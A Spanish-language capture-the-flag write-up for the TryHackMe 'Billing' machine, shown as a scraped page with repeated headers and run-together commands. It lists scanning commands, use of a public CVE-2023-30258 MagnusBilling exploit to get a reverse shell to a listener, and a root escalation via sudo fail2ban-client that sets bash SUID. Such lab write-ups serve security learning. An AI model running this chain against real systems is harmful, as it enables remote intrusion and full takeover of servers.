Billing
✍️ Autor: tryhackme, RunasRs 🔍 Dificultad: Fácil
🔍 RECONOCIMIENTO
ping -c 1 10.10.118.35

🔎 EXPLORACIÓN




🚀 EXPLOTACIÓN
Not found
🔐 PRIVILEGIOS


Last updated
✍️ Autor: tryhackme, RunasRs 🔍 Dificultad: Fácil
ping -c 1 10.10.118.35







Last updated
nmap 10.10.118.35sudo nmap -sCV -p22,80,3306 -v 10.10.118.35gobuster dir -w /usr/share/wordlists/dirbuster/directory-list-2.3-medium.txt -x html,htm,php,txt,xml,js -u http://10.10.118.35git clone https://github.com/tinashelorenzi/CVE-2023-30258-magnus-billing-v7-exploit.git
cd CVE-2023-30258-magnus-billing-v7-exploitnc -nlvp 4444
python3 exploit.py -t 10.10.118.35 -a 10.8.146.101 -p 4444whoamisudo -lscript /dev/null -c bash
CTRL+Z
stty raw -echo; fg
reset xterm
export TERM=xterm
export SHELL=bashsudo /usr/bin/fail2ban-client status
sudo /usr/bin/fail2ban-client get ast-cli-attck actions
sudo /usr/bin/fail2ban-client set ast-cli-attck addaction evil
sudo /usr/bin/fail2ban-client set ast-cli-attck action evil actionban "chmod +s /bin/bash"
sudo /usr/bin/fail2ban-client set ast-cli-attck banip 1.2.3.5
/bin/bash -p